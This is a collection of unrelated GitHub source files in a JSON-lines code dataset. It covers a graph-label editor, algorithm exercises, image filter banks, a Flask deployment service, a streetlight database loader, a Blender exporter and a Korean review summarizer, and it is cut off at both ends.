offset to position node label;\n # we will improve the placement by updating all node label offsets\n self.node_label_offset[node] = next(iter(self.node_label_offset.values()))\n self._update_node_label_offsets()\n self.draw_node_labels({node : ''}, self.node_label_fontdict)\n\n self._edit_text_object(self.node_label_artists[node], key)\n\n\n def _edit_edge_label(self, artist, key):\n edge = self.artist_to_key[artist]\n if edge not in self.edge_label_artists:\n self.draw_edge_labels({edge : ''}, self.edge_label_position,\n self.edge_label_rotate, self.edge_label_fontdict)\n\n self._edit_text_object(self.edge_label_artists[edge], key)\n\n\n def _edit_annotations(self, key):\n for artist in self._selected_artists:\n if artist not in self.annotated_artists:\n if artist not in self.artist_to_annotation:\n self.artist_to_annotation[artist] = ''\n self.annotated_artists.add(artist)\n placement = self._get_annotation_placement(artist)\n self._add_annotation(artist, *placement)\n\n self._edit_text_object(self.artist_to_text_object[artist], key)\n self.artist_to_annotation[artist] = self.artist_to_text_object[artist].get_text()\n\n\n def _edit_text_object(self, text_object, key):\n if len(key) == 1:\n text_object.set_text(text_object.get_text() + key)\n elif key == 'backspace':\n text_object.set_text(text_object.get_text()[:-1])\n self.fig.canvas.draw_idle()\n","repo_name":"paulbrodersen/netgraph","sub_path":"netgraph/_interactive_variants.py","file_name":"_interactive_variants.py","file_ext":"py","file_size_in_byte":22592,"program_lang":"python","lang":"en","doc_type":"code","stars":586,"dataset":"github-code","pt":"53"} +{"seq_id":"31150335822","text":"'''\n프로그래머스 - 디스크 컨트롤러\n'''\n\nimport heapq\n\ndef solution(jobs):\n answer = 0\n time = 0\n start = -1\n count = 0\n h = []\n while count < len(jobs):\n for job in jobs:\n if start < job[0] <= time:\n heapq.heappush(h, [job[1], job[0]])\n \n if h:\n cur = heapq.heappop(h) \n start = time\n time += cur[0]\n answer += (time - cur[1])\n count += 1\n else:\n time += 1\n\n return int(answer / len(jobs))\n\n","repo_name":"JIKMAN/Algorithm","sub_path":"coding_test/programmers-디스크 컨트롤러.py","file_name":"programmers-디스크 컨트롤러.py","file_ext":"py","file_size_in_byte":560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16756371844","text":"import cv2\nimport matplotlib\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport itertools\n\n#a function for plotting filters\ndef plot_grid_images(images, rows, cols, name, scale=1 ):\n fig, axes = plt.subplots(rows, cols, figsize=(cols*scale,rows*scale), subplot_kw=dict(xticks=[], yticks=[]))\n\n for i, image in enumerate(images):\n axes[i//cols, i%cols].imshow(image, cmap='gray')\n #plt.show()\n fig.savefig(name)\n#first derivatives of Gaussians\ndef gaussian1d(sigma, mean, x, ord):\n x = np.array(x)\n x_ = x - mean\n var = sigma**2\n g1 = (1/np.sqrt(2*np.pi*var))*(np.exp((-1*x_*x_)/(2*var)))\n g = [g1, -g1*((x_)/(var)), g1*(((x_*x_) - var)/(var**2))][ord]\n return g\n#second derivatives of Gaussians\ndef gaussian2d(sup, scales):\n var = scales * scales\n shape = (sup,sup)\n n,m = [(i - 1)/2 for i in shape]\n x,y = np.ogrid[-m:m+1,-n:n+1]\n g = (1/np.sqrt(2*np.pi*var))*np.exp( -(x*x + y*y) / (2*var) )\n return g\n#Laplacian of Gaussian\ndef log2d(sup, scales):\n var = scales * scales\n shape = (sup,sup)\n n,m = [(i - 1)/2 for i in shape]\n x,y = np.ogrid[-m:m+1,-n:n+1]\n g = (1/np.sqrt(2*np.pi*var))*np.exp( -(x*x + y*y) / (2*var) )\n h = g*((x*x + y*y) - var)/(var**2)\n return h\n\ndef makefilter(scale, phasex, phasey, pts, sup):\n gx = gaussian1d(3*scale, 0, pts[0,...], phasex)\n gy = gaussian1d(scale, 0, pts[1,...], phasey)\n image = np.reshape(gx*gy,(sup,sup))\n return image\n\ndef makeLMfilters():\n sup = 49\n scalex = np.sqrt(2) * np.array([1,2,3])\n norient = 6\n nrotinv = 12\n\n nbar = len(scalex)*norient\n nedge = len(scalex)*norient\n nf = nbar+nedge+nrotinv\n hsup = (sup - 1)/2\n\n x = [np.arange(-hsup,hsup+1)]\n y = [np.arange(-hsup,hsup+1)]\n\n [x,y] = np.meshgrid(x,y)\n\n orgpts = [x.flatten(), y.flatten()]\n orgpts = np.array(orgpts)\n\n edge, bar, spot = [], [], []\n for scale in range(len(scalex)):\n for orient in range(norient):\n angle = (np.pi * orient)/norient\n c = np.cos(angle)\n s = np.sin(angle)\n rotpts = [[c+0,-s+0],[s+0,c+0]]\n rotpts = np.array(rotpts)\n rotpts = np.dot(rotpts,orgpts)\n bar.append(makefilter(scalex[scale], 0, 1, rotpts, sup))\n edge.append(makefilter(scalex[scale], 0, 2, rotpts, sup))\n\n scales = np.sqrt(2) * np.array([1,2,3,4])\n\n for i in range(len(scales)):\n spot.append(gaussian2d(sup, scales[i]))\n\n for i in range(len(scales)):\n spot.append(log2d(sup, scales[i]))\n\n for i in range(len(scales)):\n spot.append(log2d(sup, 3*scales[i]))\n\n return edge, bar, spot\n\nfilterbanks = {}\nfilterbanks['LM'] = [{'kernel': filter} for filter in itertools.chain(*makeLMfilters())]\n\nplot_grid_images(images=[cv2.resize(filter['kernel'], (100, 100)) for filter in filterbanks['LM']],\n rows=4, cols=12 , name = 'LM.png')\n\n\n\ndef makeRFSfilters(radius=24, sigmas=[1, 2, 4], n_orientations=6):\n \n def make_gaussian_filter(x, sigma, order=0):\n if order > 2:\n raise ValueError(\"Only orders up to 2 are supported\")\n # compute unnormalized Gaussian response\n response = np.exp(-x ** 2 / (2. * sigma ** 2))\n if order == 1:\n response = -response * x\n elif order == 2:\n response = response * (x ** 2 - sigma ** 2)\n # normalize\n response /= np.abs(response).sum()\n return response\n\n def makefilter(scale, phasey, pts, sup):\n gx = make_gaussian_filter(pts[0, :], sigma=3 * scale)\n gy = make_gaussian_filter(pts[1, :], sigma=scale, order=phasey)\n f = (gx * gy).reshape(sup, sup)\n # normalize\n f /= np.abs(f).sum()\n return f\n\n support = 2 * radius + 1\n x, y = np.mgrid[-radius:radius + 1, radius:-radius - 1:-1]\n orgpts = np.vstack([x.ravel(), y.ravel()])\n\n rot, edge, bar = [], [], []\n for sigma in sigmas:\n for orient in range(n_orientations):\n # Not 2pi as filters have symmetry\n angle = np.pi * orient / n_orientations\n c, s = np.cos(angle), np.sin(angle)\n rotpts = np.dot(np.array([[c, -s], [s, c]]), orgpts)\n edge.append(makefilter(sigma, 1, rotpts, support))\n bar.append(makefilter(sigma, 2, rotpts, support))\n length = np.sqrt(x ** 2 + y ** 2)\n rot.append(make_gaussian_filter(length, sigma=10))\n rot.append(make_gaussian_filter(length, sigma=10, order=2))\n\n # # reshape rot and edge\n # edge = np.asarray(edge)\n # edge = edge.reshape(len(sigmas), n_orientations, support, support)\n # bar = np.asarray(bar).reshape(edge.shape)\n # rot = np.asarray(rot)[:, np.newaxis, :, :]\n return edge, bar, rot\n\nfilterbanks['RFS'] = [{'kernel': filter} for filter in itertools.chain(*makeRFSfilters())]\n\nplot_grid_images(images=[cv2.resize(filter['kernel'], (100, 100)) for filter in filterbanks['RFS']],\n rows=4, cols=10 , name='RFS.png')\n\n\ndef makeSfilters():\n params = [(2,1),(4,1),(4,2),(6,1),(6,2),(6,3),(8,1),\n (8,2),(8,3),(10,1),(10,2),(10,3),(10,4)]\n filters = [makefilter(49, *param) for param in params]\n return filters\n\ndef makefilter(sup,sigma,tau):\n hsup = (sup - 1)/2\n x = [np.arange(-hsup,hsup+1)]\n y = [np.arange(-hsup,hsup+1)]\n [x,y] = np.meshgrid(x,y)\n r=np.sqrt(x*x+y*y)\n f=np.cos(r*(np.pi*tau/sigma))*np.exp(-(r*r)/(2*sigma*sigma))\n f=f-np.mean(f[:])\n f=f/np.sum(np.abs(f[:]))\n return f\n\nfilterbanks['S'] = [{'kernel': filter} for filter in makeSfilters()]\n\nplot_grid_images(images=[cv2.resize(filter['kernel'], (100, 100)) for filter in filterbanks['S']],\n rows=4, cols=4 , name='S.png')","repo_name":"soroush-mim/AUT-Machine-Vision","sub_path":"hw3/4.py","file_name":"4.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1258679221","text":"import os\nfrom PIL import Image\n\nif __name__ == '__main__':\n mode1_dir = '/mnt/train_rotate180/'\n mode2_dir = '/mnt/valid_rotate180/'\n #mode3_dir = '/home/chen-ubuntu/Desktop/checks_dataset/valid_crop_mode3'\n\n dirlist = [mode1_dir, mode2_dir]#, mode3_dir]\n\n merge_dir = '/mnt/tvmerge_rotate180/'\n\n for i in range(2):\n img_dir = os.path.join(dirlist[i], 'images')\n img_files = os.listdir(img_dir)\n for img_file in sorted(img_files):\n img_path = os.path.join(img_dir, img_file)\n img = Image.open(img_path)\n new_path = os.path.join(merge_dir, 'images', img_file)\n print(new_path)\n img.save(new_path)\n\n for i in range(2):\n txt_dir = os.path.join(dirlist[i], 'labels')\n txt_files = os.listdir(txt_dir)\n for txt_file in sorted(txt_files):\n txt_path = os.path.join(txt_dir, txt_file)\n #img = Image.open(img_path)\n new_path = os.path.join(merge_dir, 'labels', txt_file)\n print(new_path)\n #img.save(new_path)\n with open(new_path, 'w') as writer:\n with open(txt_path, 'r') as lines:\n lines = lines.readlines()\n for l, line in enumerate(lines):\n writer.write(line)\n writer.close()\n","repo_name":"SunnyangBoy/checks_recognize_v2","sub_path":"crop_merge.py","file_name":"crop_merge.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"39335777126","text":"# 二分查找算法\ndef binary_search(col, item):\n low = 0\n high = len(col) - 1\n while low <= high:\n mid = (low + high) // 2\n guss = list[mid]\n if guss > item:\n high = mid - 1\n elif guss == item:\n return mid\n elif guss < item:\n low = mid + 1\n\n return None\n","repo_name":"LionelOrange/pyexample","sub_path":"example1/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":337,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39291580471","text":"from flask import Flask, jsonify, request \r\nfrom flask_api import status\r\nfrom flask_limiter import Limiter\r\nfrom flask_limiter.util import get_remote_address\r\nfrom utils import *\r\nfrom settings import *\r\n\r\napp = Flask(__name__)\r\nlimiter = Limiter(\r\n get_remote_address,\r\n app=app,\r\n default_limits=[\"1/second\"]\r\n)\r\n\r\ninit_db()\r\n\r\n@app.route(\"/deploy\", methods=['GET'])\r\ndef deploy():\r\n SERVICE_PARAM_KEY = \"service\"\r\n \r\n req_param = request.args.to_dict()\r\n param_verify_result = verify_parameters([SERVICE_PARAM_KEY], req_param.keys())\r\n if param_verify_result != None:\r\n return param_verify_result\r\n \r\n service_name = req_param[SERVICE_PARAM_KEY]\r\n \r\n # Connect to DB \r\n connect = sqlite3.connect(DATABASE, isolation_level=None)\r\n cursor = connect.cursor()\r\n \r\n # Get the service info\r\n cursor.execute(\"SELECT repo, deployed_commit, port_info, volumes FROM service WHERE name=?\", (service_name,))\r\n s = cursor.fetchone()\r\n if s == None:\r\n return {RES_STATUS_KEY: status.HTTP_404_NOT_FOUND, RES_ERROR_MESSAGE: \"service not exists\"}, status.HTTP_404_NOT_FOUND\r\n repo, deployed_commit, port_info, volume_string = s\r\n \r\n # Verify volume String\r\n volumes = parse_volumes(volume_string)\r\n volumes_verify_result = verify_volumes(volumes)\r\n if volumes_verify_result != None:\r\n return volumes_verify_result\r\n volume_arg = map_volume_to_local_dir(service_name, volumes)\r\n \r\n # Clone or pull repo\r\n subprocess.call([\"bash\", \"./update_repo.sh\", CWD, service_name, repo])\r\n \r\n # Parse commit id\r\n last_commit_id = subprocess.run([\"git\", \"log\", '--format=\"%H\"', \"-n\", \"1\"], capture_output=True, cwd=service_name).stdout.decode()\r\n \r\n # Verify commit\r\n if last_commit_id == deployed_commit:\r\n return {RES_STATUS_KEY: status.HTTP_400_BAD_REQUEST, RES_ERROR_MESSAGE: \"{}@{} already deployed\".format(service_name, deployed_commit)}, status.HTTP_400_BAD_REQUEST \r\n \r\n # Update latest commit \r\n cursor.execute(\"UPDATE service SET deployed_commit=? WHERE name=?\", (last_commit_id, service_name))\r\n connect.commit()\r\n \r\n # Deploy as a docker container (subprocess)\r\n subprocess.call([\"bash\", \"./deploy_repo.sh\", CWD, service_name, port_info, volume_arg])\r\n \r\n res = {}\r\n res[RES_STATUS_KEY] = status.HTTP_200_OK\r\n res[RES_DATA_KEY] = \"Deployed the service {} successfully!\".format(service_name)\r\n return res, status.HTTP_200_OK\r\n\r\n\r\n\r\n# Enroll project\r\n@app.route(\"/enroll\", methods=['POST'])\r\ndef enroll():\r\n ACCESS_TOKEN_HEADER_KEY = \"Access-Token\"\r\n SERVICE_NAME_PARAM_KEY = \"service\"\r\n SERVICE_REPO_PARAM_KEY = \"repo\"\r\n SERVICE_PORT_INFO_PARAM_KEY = \"port_info\"\r\n SERVICE_VOLUMES_PARAM_KEY = \"volumes\"\r\n \r\n req_header = request.headers\r\n req_param = request.form\r\n\r\n # Verification\r\n header_verify_result = verify_parameters([ACCESS_TOKEN_HEADER_KEY], req_header.keys(), is_header=True)\r\n if header_verify_result != None:\r\n return header_verify_result\r\n if req_header[ACCESS_TOKEN_HEADER_KEY] != ACCESS_TOKEN:\r\n return {RES_STATUS_KEY: status.HTTP_403_FORBIDDEN, RES_ERROR_MESSAGE: \"invalid access token\"}, status.HTTP_403_FORBIDDEN\r\n param_verify_result = verify_parameters([SERVICE_NAME_PARAM_KEY, SERVICE_REPO_PARAM_KEY, SERVICE_PORT_INFO_PARAM_KEY, SERVICE_VOLUMES_PARAM_KEY], req_param.keys())\r\n if param_verify_result != None:\r\n return param_verify_result\r\n \r\n service = req_param[SERVICE_NAME_PARAM_KEY]\r\n repo = req_param[SERVICE_REPO_PARAM_KEY]\r\n port_info = req_param[SERVICE_PORT_INFO_PARAM_KEY]\r\n volumes = req_param[SERVICE_VOLUMES_PARAM_KEY]\r\n \r\n # Connect to DB\r\n connect = sqlite3.connect(DATABASE, isolation_level=None)\r\n cursor = connect.cursor()\r\n \r\n # INSERT the service into DB\r\n cursor.execute('SELECT * FROM service WHERE name=?', (service,))\r\n s = cursor.fetchall()\r\n if(len(s)==0): # New Service\r\n cursor.execute(\"INSERT INTO service(name, repo, deployed_commit, port_info, volumes) VALUES (?, ?, ?, ?, ?)\", (service, repo, \"NO_DEPLOYMENT_YET\", port_info, volumes))\r\n cursor.execute('UPDATE service SET repo=? WHERE name=?', (repo, service,))\r\n \r\n res = {}\r\n res[RES_STATUS_KEY] = status.HTTP_200_OK\r\n res[RES_DATA_KEY] = \"The service {} was successfully created\".format(service)\r\n return jsonify(res)\r\n\r\n# app.run(host=\"localhost\",port=5050)","repo_name":"HeXA-UNIST/automated-deployment","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41124785842","text":"class Solution(object):\n def singleNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n\n freq = {}\n for numbers in nums:\n if numbers in freq:\n freq[numbers] +=1\n else:\n freq[numbers] =1\n\n for k,v in freq.items():\n if v ==1:\n return k\n\n # Below is a better solution using bitwise XOR\n\n # res=0\n # for num in nums:\n # res = num^res\n # print(res)\n # return res\n","repo_name":"AkshayPunhani/leetcode","sub_path":"singleNumber.py","file_name":"singleNumber.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26133886633","text":"import pandas\nimport pymongo\nimport numpy as np\n\nmyclient = pymongo.MongoClient(\"mongodb://localhost:27017/\")\n\ndb = myclient[\"street-lights-db\"]\nstreetlights = db[\"streetlights\"]\nloggedInUsers = db[\"LoggedIn-Users\"]\nadministration_ids = db[\"administration-details\"]\nccms = db[\"ccms\"]\nreports = db[\"reports\"]\nresolved_report = db['resolved-reports']\nunique_token = db['unique-token']\n\nstreetlights.drop()\nloggedInUsers.drop()\nadministration_ids.drop()\nreports.drop()\nresolved_report.drop()\nccms.drop()\nunique_token.drop()\n\n\nfor x in streetlights.find()[:10]:\n print(x)\nprint(sum([1 for x in streetlights.find()]))\n\n# csv_files = ['./data/Najafgarh-1.csv', './data/Najafgarh-2.csv', './data/South-1.csv', './data/South-2.csv', './data/West-1.csv', './data/West-2.csv', './data/West-3.csv', './data/West-4.csv','./data/Central-1.csv', './data/Central-2.csv', './data_new/Najafgarh-1.csv', './data_new/Najafgarh-2.csv', './data_new/South-1.csv', './data_new/South-2.csv', './data_new/West-1.csv', './data_new/West-2.csv', './data_new/West-3.csv', './data_new/West-4.csv','./data_new/Central-1.csv', './data_new/Central-2.csv', './data_new/West-12.csv','./data_new/West-22.csv', './data/Added Lights.csv'] \ncsv_files = ['./data/Added Lights.csv']\nexcel_files = ['./data_final/South Zone Installation with unique pole number 02-05-2022.xlsx', './data_final/WZ Data with Unique Pole Number.xlsx', './data_final/CZ Data with Unique Pole Number Cleaned.xlsx', './data_final/NZ Data with Unique Pole Number Cleaned.xlsx']\n\n#excel_files = ['./data_final/South Zone Installation with unique pole number 02-05-2022.xlsx']\n\nlampposts = []\nstreetlights_dfs = []\n\ndeletedLights = pandas.read_csv('./data/Deleted Lights.csv')\n\n\nfor file in csv_files:\n streetlights_dfs.append(pandas.read_csv(file, dtype={'Unique Pole No.':str, 'Wattage':str, 'Latitude':np.float64, 'Longitude':np.float64}))\n\nfor file in excel_files:\n dfs = pandas.read_excel(file, sheet_name = None, dtype={'Unique Pole No.':str, 'Wattage':str, 'Latitude':np.float64, 'Longitude':np.float64}) # read all sheets\n for sheet in dfs.keys():\n streetlights_dfs.append(dfs[sheet])\n\n\ndf_final = pandas.concat(streetlights_dfs)\ndf_final_latlng = df_final[['Longitude', 'Latitude', 'CCMS NO', 'Zone', 'Type of Light', 'No. Of Lights', 'Ward No.' , 'Wattage', 'Unique Pole No.']]\ndf_final_latlng = df_final_latlng.drop_duplicates(keep= 'last')\ndf_final_latlng = df_final_latlng.dropna(subset=['Unique Pole No.','CCMS NO','Latitude','Longitude'])\n\n\ndf_final_latlng = pandas.concat([df_final_latlng, deletedLights, deletedLights]).drop_duplicates(keep=False)\ndf_final_latlng = df_final_latlng.dropna(subset=['Unique Pole No.','CCMS NO','Latitude','Longitude'])\n\ndf_final_latlng = df_final_latlng.fillna('')\n\ntemp = df_final_latlng.values.tolist()\ntemp = map(lambda x : {'lat':x[1], 'lng':x[0], 'CCMS_no': x[2], 'zone': x[3], 'Type of Light':x[4], 'No. Of Lights':x[5], 'Ward No.':x[6], 'wattage': x[7],'Connected Load':-1, 'Actual Load':-1, '_id':x[8]}, temp)\nlampposts += temp\n\nstreetlights.insert_many(lampposts)\n\nprint(\"Total lights uploaded: \", sum([1 for x in streetlights.find()]))\n\nfor x in streetlights.find()[:10]:\n print(x)\n\n# loading admin creadentials\nadmin_details = pandas.read_csv('./admin_credentials/admin_details.csv', dtype={'agency':str,'Ward_No':str, 'zone':str})\nadmin_details = admin_details.dropna(subset=['Email'])\n\nadmin_details = admin_details.fillna('')\ntemp = admin_details.values.tolist()\ntemp = map(lambda x : {'Name':x[0], 'Email':x[1], 'agency': x[2], 'Ward_No': x[3], 'zone':x[4]}, temp)\nadministration_ids.insert_many(temp)\n\nfor x in administration_ids.find():\n print(x)\n","repo_name":"aryan10behal/Roshni","sub_path":"street-lights-db/load.py","file_name":"load.py","file_ext":"py","file_size_in_byte":3669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74352013929","text":"import bpy\nimport struct\nimport time\n\nbdata = bpy.data\ncollec = bpy.context.collection\n\ntimeStart = time.time() # start timer\nprint(f\"TIME STARTED {time.localtime().tm_hour}:{time.localtime().tm_min}\")\n\n\nfilePath = \"G:/Emulated/Playstation 2/Games/SSX Tricky/data/models/\"\nfileName = \"snow\"\nfileSuff = \"ltg\"\n\nscaleMult = 100\n\n\n\ndef export_bounds():\n\n f = open(filePath+\"/\"+fileName+\".\"+fileSuff, 'r+b')\n\n en = \"<\"\n\n f.seek(0x3, 0)\n (enByte,) = struct.unpack('B', f.read(1))\n\n if enByte == 1:\n en = \">\"\n\n pack_write_bounds(f\"{fileName}_bbox.world\", f, en) # export world bounds\n\n f.seek(0x2C, 0)\n\n (offsetCount ,) = struct.unpack(en+'I', f.read(4))\n (offsetListCount,) = struct.unpack(en+'I', f.read(4))\n\n f.seek(0x48, 0)\n\n (gridBoxCount ,) = struct.unpack(en+'I', f.read(4)) # = 16\n (offsetListOffset,) = struct.unpack(en+'I', f.read(4)) # = 84\n (offsetListEnd ,) = struct.unpack(en+'I', f.read(4))\n\n f.seek(offsetListOffset, 0)\n\n offsetListContainer = []\n for i in range(offsetListCount):\n\n offsetTuple = struct.unpack(en+'I'*offsetCount, f.read(4*offsetCount))\n offsetListContainer.append(offsetTuple)\n\n\n sortedOffsetList = clear_list(offsetListContainer)\n\n\n for i in range(len(sortedOffsetList)):\n\n f.seek(sortedOffsetList[i], 0)\n\n objName = f\"{fileName}_bbox.a_{i}\"\n\n pack_write_bounds(objName, f, en)\n\n f.seek(48, 1) # skip extras\n\n print(f\"\\n{objName} Ends:{hex(f.tell())} Values:\\n\")\n\n\n for j in range(gridBoxCount):\n\n obj2Name = f\"{fileName}_bbox.b_{i}_{j}\"\n\n pack_write_bounds(obj2Name, f, en)\n\n f.seek(40, 1) # skip extras\n \n print(f\"{obj2Name} Ends:{hex(f.tell())} Values:\\n\")\n \n \n timeEnd = time.time()\n print(f\"\\nFINISHED ({time.localtime().tm_hour}:{time.localtime().tm_min})\\nTime taken {round(timeEnd-timeStart, 4)}s\")\n\n f.close()\n\n\ndef midpoint2(a, b):\n return (a + b)/ 2\n\ndef clear_list(messyList): # removes 0's from list\n clearedList = []\n for i in range(len(messyList)):\n for j in range(len(messyList[0])): # remove null offsets\n if messyList[i][j] > 0:\n clearedList.append(messyList[i][j])\n return clearedList\n\n\ndef pack_write_bounds(objName, file, endianess): # export bounds and calculated origin\n\n obj = bdata.objects[objName]\n vertices = obj.data.vertices\n \n verts = [obj.matrix_world @ vert.co for vert in vertices]\n\n for i in range(len(verts)):\n verts[i] *= scaleMult\n\n origin = midpoint2(verts[0], verts[1])\n\n\n file.write(struct.pack(endianess+'f'*6, *[ # write bounds\n verts[0][0],verts[0][1],verts[0][2],\n verts[1][0],verts[1][1],verts[1][2]\n ]))\n\n file.write(struct.pack(endianess+'f'*3, *[ # write origin\n origin[0],origin[1],origin[2]\n ]))\n \n #print(verts)\n #print(origin)\n\n #file.seek(0x24, 1)\n\n\ndef run_wout_update(func): # run without view update\n from bpy.ops import _BPyOpsSubModOp\n view_layer_update = _BPyOpsSubModOp._view_layer_update\n def dummy_view_layer_update(context):\n pass\n try:\n _BPyOpsSubModOp._view_layer_update = dummy_view_layer_update\n func()\n finally:\n _BPyOpsSubModOp._view_layer_update = view_layer_update\n\n\nrun_wout_update(export_bounds)\n","repo_name":"Linkz64/Python-Scripts","sub_path":"Blender/SSX/SSX Tricky/ssx2_export_world_ltg-btg.py","file_name":"ssx2_export_world_ltg-btg.py","file_ext":"py","file_size_in_byte":3367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"2656093828","text":"import re\nimport math\nimport requests\nimport networkx\nimport numpy as np\nfrom konlpy.tag import Okt\nfrom rank_bm25 import BM25Okapi\n\ndefault_stopwords = ['좋아요', '너무', '신발', '배송', '좀', '딱', '것', '주문', '마음', '때', '생각', '신어', '신고', '들어요', '상품', '좋습니다', '더', '맘', '좋은', '좋네요', '이뻐요', '정말', '아주', '거', '예뻐요'\n , '이쁘고', '감사합니다', '신', '평소', '좋고', '느낌', '이쁘네요', '색상', '완전', '제', '예쁘고', '고민', '그래도', '근데', '여름', '저', '대비', '신으면', '원래', '보고', '받았습니다', '빠른', '발도', '이쁩니다',\n '듭니', '실물', '깔끔하고', '또', '아들', '하세요', '신을게요', '분', '버스', '신는', '매우', '괜찮아요', '사서', '하게', '자주', '그리고', '하지만', '걱정', '예쁘네요', '네', '매장', '사람', '일단', '블랙', '흰색', '다만', '이번'\n , '다른', '색깔', '아이', '커플', '같은', '할인', '있어', '하고', '될', '없이', '이뻐서', '바로', '샀습니다', '보면', '예쁩니다', '전부', '상태', '쏙', '개', '파세요', '쿠폰', '좋아하네요', '스타일', '기분', '사세요', '빨리'\n , '예뻐서', '믿고', '훨씬', '좋아서', '때문', '포장', '꼭', '있을', '괜찮네요', '포인트', '살', '들어', '있네요', '굳', '받았어요', '반품', '뭐', '개인', '사고', '좋은데', '이쁘게', '괜찮은', '색도', '모두', '아직', '효과', '친구'\n , '엄마', '샀네요', '아직', '그대로', '다시', '만족해요', '좋아', '품절', '그래서', '심플', '계속', '신으니', '빨라요', '신랑', '물건', '무엇', '사줬는데', '선택', '드립니다', '한번', '곳', '신분', '강추', '작성', '받아', '딸', '여자친구'\n , '지금', '번', '좋음', '확실히', '후회', '봤는데', '전체', '같이', '왜', '있지만', '실제', '굿굿', '나', '굉장히', '기능', '산', '좋아해요', '와서', '예쁘게', '드렸는데', '한데', '같아', '분들', '했지만', '좋아용', '줄', '좋다고'\n , '하시면', '거의', '긴한데', '알았는데', '봄', '온', '백화점', '안드로이드', '내', '신습니다', '이쁨', '아무', '동생', '신을수', '의견', '저', '인해', '도착', '기도', '이유', '짱', '신던', '된', '게시', '만족도', '일반', '주관', '되어'\n , '소지', '무조건', '해도', '미리', '검정색', '사면', '빠르게', '그런데', '제', '무신', '건', '좋구요', '가장', '예쁜', '검은색', '도움', '잘산거', '이렇게', '이쁜데', '산거', '그렇게', '괜찮습니다', '성능', '이쁘', '트', '옥션', '되고'\n , '다닐', '감사', '되서', '오늘', '는', '택배', '시간', '득템', '꿈', '번창', '아니라', '타이', '정품', '딸아이', '없어요', '좋았습니다', '나름', '어느', '캐', '싸', '흰' '모델', '문제', '매일', '임', '남자친구', '시', '살까', '문'\n , '빠르네요', '좋을듯', '했던', '판매', '아니고', '씩', '알', '신을것', '들어하네요', '새', '니', '하지', '될것', '하다', '집', '왔네요', '신고있어요', '두번째', '맨날', '맛', '확인', '재', '가지', '갈', '오프라인', '금방', '다행', '맘에듭니'\n , '어느', '받고', '이쁜거', '특히', '귀엽고', '깔', '있었는데', '걍', '눈', '착한', '인터넷', '이용', '포스', '직접', '이쁘다고', '추합니다', '신경', '싶었는데', '검', '에드', '땐', '달', '신청', '귀찮아서', '상당히', '대박', '사길'\n , '베이지', '어머니', '뭔가', '그거', '리뷰', '적극', '자마자', '아빠', '좋으네요', '만족스러워요', '사실', '첨', '빠릅니다', '찾다가', '하면서', '하시네요', '할게요', '하자', '쫌', '오른쪽', '좋아해서', '좀더', '여러', '작년', '오히려'\n , '재고', '주얼', '착하고', '이런', '편입', '하얀색', '와이프', '좋아하시네요', '일주일', '이틀', '존예', '잘산것', '추강', '감사해요', '조아', '무신사', '예쁘다고', '예상', '짱짱', '빨랐어요', '암튼', '음', '레드', '환불', '해외', '싸게잘'\n , '적립금', '빠름', '좋겠네요', 'G', '예뻐용', '벗', '더욱', '엇', '남친', '지인', '부모님', '여성', '이뿌네요', '취소', '굿굿굿', '노란색', '감사합니당', '행사', '예쁘고요', '무슨', '종일', '해주세요', '괜찮', '바랍니다', '일부러', '딱히'\n , '사랑', '그렇고', '모든', '며칠', '검은', '좋다네요', '새끼', '쇼핑', '굳이', 's', '직원', '정가', '좋아하세요', '언제나', '하긴', '총알', '여러분', '내년', '지급', '언니', '갓', '모르겠어요', '결제', '괜찮음', 'Good', '정확히', '느리지만'\n ,'금액', '빨강', '여러가지', '심하게', '한가지', '당연히', '만원', '예뻐여', 'very', '뭘', '게다가', '갑자기', '아쉬운건', '당장', '부탁드려요', '통해', '고딩', '고등학생', '아영', '일찍', '점점', '완젼', '일요일', '배달', '홈쇼핑', '파시'\n , '출퇴근', '어머님', '스티커', '든다네요', '지연', '좋았구요', '잘쓸게요', '개꿀', '예쁘다', '귀엽습니다', '귀여워서', '물품', '살게요', '왕', '대박나세요', '예쁘다', '말씀', '들어하시네요', '사길잘', '예쁘고요', '오빠', '남동생', '역쉬'\n , '큰일', '화요일', '입학', '노란', '느려서', '기다렸는데', '아닌가', '이상하게', '좋아하시는', '만족하면서', '노란', '사이즈', '이벤트', '딸램', '수업', '블프', '좋아하고', '한국', '근본', '엄청나게', '같네요', '같아용', '가격', '저렴', '싸', '비싸'\n , '싸게', '싸서', '비싸고', '비싸지만', '싸네요', '싸니까', '싸요', '비싸긴', '비싸네요', '싸다', '싸지만', '싸다고', '비싸다고', '비싸지만', '싸구']\n\nclass KoreanReviewSummarizerError(Exception):\n pass\n\nclass SentenceObj:\n\n def __init__(self, text, tokens=[], index=0):\n self.index = index\n self.text = text\n self.tokens = tokens\n\nclass Summarizer:\n\n def __init__(self, k=3\n , useful_tags=['Noun', 'Verb', 'Adjective', 'Determiner', 'Adverb', 'Conjunction', 'Josa', 'PreEomi', 'Eomi', 'Suffix', 'Alpha', 'Number']\n , stopwords=None\n , delimiter='\\.|\\\\n|\\.\\\\n|\\!'\n , spell_check=True\n , return_all=False):\n self.k = k\n self.useful_tags=useful_tags\n if stopwords==None: self.stopwords=default_stopwords\n else: self.stopwords=stopwords\n self.delimiter=delimiter\n self.spell_check=spell_check\n self.return_all=return_all\n self.okt = Okt()\n if not isinstance(k, int):\n raise KoreanTextRank4ReviewError('k must be int')\n \n \n def summarize(self, reviews):\n if isinstance(reviews, list):\n reviews = ' '.join(reviews)\n self.splited_reviews = re.split(self.delimiter, 